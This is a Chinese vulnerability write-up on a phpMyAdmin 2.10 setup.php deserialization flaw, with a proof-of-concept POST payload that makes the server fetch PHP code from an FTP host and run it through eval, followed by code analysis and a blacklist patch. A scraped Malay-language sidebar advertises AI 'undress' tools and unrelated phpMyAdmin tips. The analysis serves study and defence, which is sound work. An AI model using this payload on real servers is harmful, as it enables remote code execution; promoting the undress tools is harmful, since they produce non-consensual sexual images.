phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via
目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 对这个漏洞简单的概括如下 1 . " /scripts/setup.php " 会接收用户发送的序列化POST数据action =lay_navigationeoltype=unixtoken=ec4c4c184a
目录
<span>1</span><span>. 漏洞描述 </span><span>2</span><span>. 漏洞触发条件 </span><span>3</span><span>. 漏洞影响范围 </span><span>4</span><span>. 漏洞代码分析 </span><span>5</span><span>. 防御方法 </span><span>6</span>. 攻防思考
1. 漏洞描述
对这个漏洞简单的概括如下
<span>1</span>. <span>"</span><span>/scripts/setup.php</span><span>"</span><span>会接收用户发送的序列化POST数据 action</span>=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%<span>22</span>%3A1%3A%7Bs%3A6%3A%22source%<span>22</span>%3Bs%3A24%3A%22ftp%3A%2f%2f10.<span>125.62</span>.<span>62</span>%2fs.txt%<span>22</span>%3B%7D%<span>7D </span><span>/*</span><span> token要动态获取 action=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}} </span><span>*/</span> <span>2</span>. <span>"</span><span>/scripts/setup.php</span><span>"</span>会对<span>"</span><span>$_POST['configuration']</span><span>"</span><span>进行反序列化 setup.php在反序列化的时候,程序未对输入的原始数据进行有效地恶意检测 </span><span>3</span>. 黑客可以在POST数据中注入<span>"</span><span>序列化后的PMA_Config对象</span><span>"</span><span> setup.php在反序列化一个</span><span>"</span><span>序列化后的PMA_Config对象</span><span>"</span>的时候,会对这个对象进行<span>"</span><span>重新初始化</span><span>"</span><span>,即再次调用它的构造函数 function __construct($source </span>= <span>null</span><span>) { $</span><span>this</span>->settings =<span> array(); </span><span>//</span><span> functions need to refresh in case of config file changed goes in </span><span>//</span><span> PMA_Config::load()</span> $<span>this</span>-><span>load($source); </span><span>//</span><span> other settings, independant from config file, comes in</span> $<span>this</span>-><span>checkSystem(); $</span><span>this</span>-><span>checkIsHttps(); } </span><span>4</span>. PMA_Config对象的构造函数会重新引入<span>"</span><span>$source</span><span>"</span>对应的配置文件,这个"$source"是对象重新初始化时本次注册得到的,使用eval执行的方式将配置文件中的变量<span>"</span><span>本地变量注册化</span><span>"</span><span> function load($source </span>= <span>null</span><span>) { $</span><span>this</span>-><span>loadDefaults(); </span><span>if</span> (<span>null</span> !==<span> $source) { $</span><span>this</span>-><span>setSource($source); } </span><span>if</span> (! $<span>this</span>-><span>checkConfigSource()) { </span><span>return</span> <span>false</span><span>; } $cfg </span>=<span> array(); </span><span>/*</span><span>* * Parses the configuration file </span><span>*/</span><span> $old_error_reporting </span>= error_reporting(<span>0</span><span>); </span><span>//</span><span>使用eval方式引入外部的配置文件</span> <span>if</span> (function_exists(<span>'</span><span>file_get_contents</span><span>'</span><span>)) { $eval_result </span>= eval(<span>'</span><span>?></span><span>'</span> . trim(file_get_contents($<span>this</span>-><span>getSource()))); } </span><span>else</span><span> { $eval_result </span>=<span> eval(</span><span>'</span><span>?></span><span>'</span> . trim(implode(<span>"</span><span>\n</span><span>"</span>, file($<span>this</span>-><span>getSource())))); } error_reporting($old_error_reporting); </span><span>if</span> ($eval_result === <span>false</span><span>) { $</span><span>this</span>->error_config_file = <span>true</span><span>; } </span><span>else</span><span> { $</span><span>this</span>->error_config_file = <span>false</span><span>; $</span><span>this</span>->source_mtime = filemtime($<span>this</span>-><span>getSource()); } ...</span>
最终的结果是,程序代码引入了黑客注入的外部文件的PHP代码,并使用eval进行了执行,导致RCE
Relevant Link:
http:<span>//</span><span>php.net/manual/zh/function.unserialize.php</span> http:<span>//</span><span>drops.wooyun.org/papers/596</span> http:<span>//</span><span>drops.wooyun.org/tips/3909</span> http:<span>//</span><span>blog.csdn.net/cnbird2008/article/details/7491216</span>
2. 漏洞触发条件
0x1: POC
token需要动态获取
<span>1</span><span>. POST http:</span><span>//</span><span>localhost/phpMyAdmin-2.10.0.2-all-languages/scripts/setup.php</span> <span>2</span><span>. DATA action</span>=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%<span>22</span>%3A1%3A%7Bs%3A6%3A%22source%<span>22</span>%3Bs%3A24%3A%22ftp%3A%2f%2f10.<span>125.62</span>.<span>62</span>%2fs.txt%<span>22</span>%3B%7D%<span>7D </span><span>/*</span><span> source要是一个外部的文本文件,需要返回的是原生的PHP代码 a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}} </span><span>*/</span>
3. 漏洞影响范围
<span>1</span>. phpmyadmin <span>2.10</span> <span>2</span>. 2.10
4. 漏洞代码分析
0x1: PHP serialize && unserialize
关于PHP序列化、反序列化存在的安全问题相关知识,请参阅另一篇文章
http:<span>//</span><span>www.cnblogs.com/LittleHann/p/4242535.html</span>
0x2: "/scripts/setup.php"
<span>if</span> (isset($_POST[<span>'</span><span>configuration</span><span>'</span>]) && $action != <span>'</span><span>clear</span><span>'</span><span> ) { </span><span>//</span><span> Grab previous configuration, if it should not be cleared</span> $configuration = unserialize($_POST[<span>'</span><span>configuration</span><span>'</span><span>]); } </span><span>else</span><span> { </span><span>//</span><span> Start with empty configuration</span> $configuration =<span> array(); }</span>
漏洞的根源在于程序信任了用户发送的外部数据,直接进行本地序列化,从而导致"对象注入",黑客通过注入当前已经存在于代码空间的PMA_Config对象,php在反序列化的时候,会自动调用对象的__wakeup函数,在__wakeup函数中,会使用外部传入的$source参数,作为配置文件的来源,然后使用eval将其引入到本地代码空间
0x3: \libraries\Config.class.php
<span>/*</span><span>* * re-init object after loading from session file * checks config file for changes and relaods if neccessary </span><span>*/</span><span> function __wakeup() { </span><span>//</span><span>在执行__wakeup()的时候,$source已经被注册为了外部传入的$source参数</span> <span>if</span> (! $<span>this</span>-><span>checkConfigSource() </span>|| $<span>this</span>->source_mtime !== filemtime($<span>this</span>-><span>getSource()) </span>|| $<span>this</span>->default_source_mtime !== filemtime($<span>this</span>-><span>default_source) </span>|| $<span>this</span>-><span>error_config_file </span>|| $<span>this</span>-><span>error_config_default_file) { $</span><span>this</span>->settings =<span> array(); $</span><span>this</span>-><span>load(); $</span><span>this</span>-><span>checkSystem(); } </span><span>//</span><span> check for https needs to be done everytime, </span><span>//</span><span> as https and http uses same session so this info can not be stored </span><span>//</span><span> in session</span> $<span>this</span>-><span>checkIsHttps(); $</span><span>this</span>-><span>checkCollationConnection(); $</span><span>this</span>-><span>checkFontsize(); }</span>
5. 防御方法
0x1: Apply Patch
<span>if</span> (isset($_POST[<span>'</span><span>configuration</span><span>'</span>]) && $action != <span>'</span><span>clear</span><span>'</span><span> ) { $configuration </span>=<span> array(); </span><span>//</span><span>协议的匹配忽略大小写</span> <span>if</span> ( (strpos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>PMA_Config</span><span>"</span>) !== <span>false</span>) && ( (stripos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>ftp://</span><span>"</span>) !== <span>false</span>) || (stripos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>http://</span><span>"</span>) !== <span>false</span><span>) ) ) { $configuration </span>=<span> array(); } </span><span>else</span><span> { </span><span>//</span><span> Grab previous configuration, if it should not be cleared</span> $configuration = unserialize($_POST[<span>'</span><span>configuration</span><span>'</span><span>]); } } </span><span>else</span><span> { </span><span>//</span><span> Start with empty configuration</span> $configuration =<span> array(); }</span>
6. 攻防思考
Copyright (c) 2014 LittleHann All rights reserved

Alat AI Hot

Undresser.AI Undress
Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover
Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool
Gambar buka pakaian secara percuma

Clothoff.io
Penyingkiran pakaian AI

AI Hentai Generator
Menjana ai hentai secara percuma.

Artikel Panas

Alat panas

Notepad++7.3.1
Editor kod yang mudah digunakan dan percuma

SublimeText3 versi Cina
Versi Cina, sangat mudah digunakan

Hantar Studio 13.0.1
Persekitaran pembangunan bersepadu PHP yang berkuasa

Dreamweaver CS6
Alat pembangunan web visual

SublimeText3 versi Mac
Perisian penyuntingan kod peringkat Tuhan (SublimeText3)

Topik panas

Kunci utama jadual ialah satu atau lebih lajur yang mengenal pasti secara unik setiap rekod dalam jadual. Berikut ialah langkah-langkah untuk menetapkan kunci utama: Log masuk ke phpMyAdmin. Pilih pangkalan data dan jadual. Semak lajur yang anda mahu gunakan sebagai kunci utama. Klik "Simpan Perubahan". Kunci utama menyediakan integriti data, kelajuan carian dan faedah pemodelan perhubungan.

Pangkalan data WordPress ditempatkan dalam pangkalan data MySQL yang menyimpan semua data tapak web dan boleh diakses melalui papan pemuka penyedia pengehosan anda, FTP atau phpMyAdmin. Nama pangkalan data berkaitan dengan URL tapak web atau nama pengguna, dan akses memerlukan penggunaan bukti kelayakan pangkalan data, termasuk nama, nama pengguna, kata laluan dan nama hos, yang biasanya disimpan dalam fail "wp-config.php".

Menambah kunci asing dalam phpMyAdmin boleh dicapai dengan mengikuti langkah berikut: Pilih jadual induk yang mengandungi kunci asing. Edit struktur jadual induk dan tambah lajur baharu dalam "Lajur". Dayakan kekangan kunci asing dan pilih jadual dan kunci rujukan. Tetapkan operasi kemas kini/padam. simpan Perubahan.

Nama pengguna dan kata laluan lalai untuk PHPMyAdmin adalah akar dan kosong. Atas sebab keselamatan, adalah disyorkan untuk menukar kata laluan lalai. Kaedah untuk menukar kata laluan: 1. Log masuk ke PHPMyAdmin 2. Pilih "privileges" 3. Masukkan kata laluan baru dan simpannya; Apabila anda terlupa kata laluan anda, anda boleh menetapkannya semula dengan menghentikan perkhidmatan MySQL dan mengedit fail konfigurasi: 1. Tambah baris skip-grant-tables 2. Log masuk ke baris arahan MySQL dan tetapkan semula kata laluan root; jadual kebenaran; 4. Padam baris skip-grant-tables, mulakan semula perkhidmatan MySQL.

Langkah-langkah untuk memadam jadual data dalam phpMyAdmin: Pilih pangkalan data dan jadual data klik tab "Tindakan" pilih pilihan "Padam" dan lakukan operasi pemadaman;

Lokasi lalai untuk fail log PHPMyAdmin: Linux/Unix/macOS:/var/log/phpmyadminWindows: C:\xampp\phpMyAdmin\logs\ Tujuan fail log: Menyelesaikan Masalah Keselamatan Audit

E dalam kalkulator mewakili kuasa 10, yang bermaksud eksponen dengan asas 10. Contohnya, 1.99714E13 bersamaan dengan 19971400000000 menyatakan nombor dalam bentuk darab dengan kuasa ke-10 dipanggil tatatanda saintifik : Apabila kita ingin menandakan atau mengendalikan sesuatu yang lebih besar atau lebih kecil dengan bilangan digit yang banyak, kita boleh menggunakan tatatanda saintifik untuk mengelakkan pembaziran banyak ruang dan masa.

Sebab dan penyelesaian untuk akses dinafikan oleh phpMyAdmin: Pengesahan gagal: Semak sama ada nama pengguna dan kata laluan adalah betul. Ralat konfigurasi pelayan: laraskan tetapan tembok api dan semak sama ada port pangkalan data adalah betul. Isu kebenaran: Memberi akses pengguna kepada pangkalan data. Tamat masa sesi: Muat semula halaman penyemak imbas dan sambung semula. Ralat konfigurasi phpMyAdmin: Semak fail konfigurasi dan kebenaran fail untuk memastikan modul Apache yang diperlukan didayakan. Isu pelayan: Tunggu sebentar dan cuba lagi atau hubungi pembekal pengehosan anda.
